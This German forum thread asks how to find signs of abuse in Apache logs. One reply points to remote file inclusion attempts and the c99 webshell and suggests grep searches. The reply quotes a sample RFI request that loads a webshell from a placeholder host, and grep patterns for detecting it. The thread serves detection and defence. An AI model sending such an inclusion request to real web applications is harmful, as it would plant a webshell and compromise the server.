gulli:board Logo

Anzeige


  Antwort
bitmac
Chief of Sarkasm
 
Benutzerbild von bitmac
 
Registrierungsdatum: Mar 2003
Ort: Old Europe
Beiträge: 464
Apache Log Analyse bzw. Erkennung von Missbrauch

Hallo zusammen,

kurz und knapp: Woran erkenne ich dass eine Website (in der Regel PHP) dazu missbraucht wurde z.B. Grafiken und Codes für Viren- und Spam-Mails auszuliefern?

Welches Analyse-Tool (lokal installiert, oder als Dienst auf dem Server) kann ich über die Webserver-Logs jagen um dort nach verdächtigen Einträgen zu suchen?

AWStats liefert seit kurzem ungewöhnlich hohen "nicht gesehenen Traffic". Laut Fußnote ist das Traffic der durch Robots, Trojaner, Viren und spezielle Status-Codes erzeugt wurde. Wie kann ich feststellen was die genaue Ursache dafür ist und vor allem was man dagegen tun kann?

chkrootkit liefert einen offenen Port (der des öfteren als Falschmeldung deklariert wurde). rkhunter liefert keine Auffälligkeiten.

Für ein paar nützliche Tipps wäre ich sehr dankbar.

CU BitMac.
Alt 21. 01. 2008, 15:10 bitmac is offline Mit Zitat antworten #1
Kugelfisch23
Nerd
 
Benutzerbild von Kugelfisch23
 
Registrierungsdatum: Oct 2007
Ort: Im Ozean
Beiträge: 3.187
Re: Apache Log Analyse bzw. Erkennung von Missbrauch

Auffällig ist etwa, wenn ein Skript mit einem Parameter aufgerufen wurde, der mit `http://` beginnt (deutet auf eine RFI hin). Ein Beispiel wäre etwa
Code:
/foo.php?bar=http://mallo.ry/c99.txt?
Allgemein ein Anzeichen für einen Angriff ist das Vorkommen von `c99.txt` (einer sehr beliebten Webshell). Injections zeigen sich oftmals durch ein Vorkommen von unerwarteten Anführungszeichen oder Apostrophen.

Zum untersuchen der Logdateien reicht `grep` meist aus.
Code:
$ grep "c99.txt" /var/log/apache2/access.log $ grep "=http://" /var/log/apache2/access.log
Alt 21. 01. 2008, 16:55 Kugelfisch23 is online now Mit Zitat antworten #2
Themen-Optionen Antwort


Themen-Optionen

Gehe zu



Alle Zeitangaben in UTC +1. Es ist jetzt 19:40 Uhr.
Angetrieben von vBulletin
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
neurosis.gullisys.net

Anmelden

Benutzername
Kennwort
© Copyright 1998-2008 gulli.com home | regeln | sitemap | kontakt | impressum | partner | downloads | disclaimer |
Message Boards and Forums Directory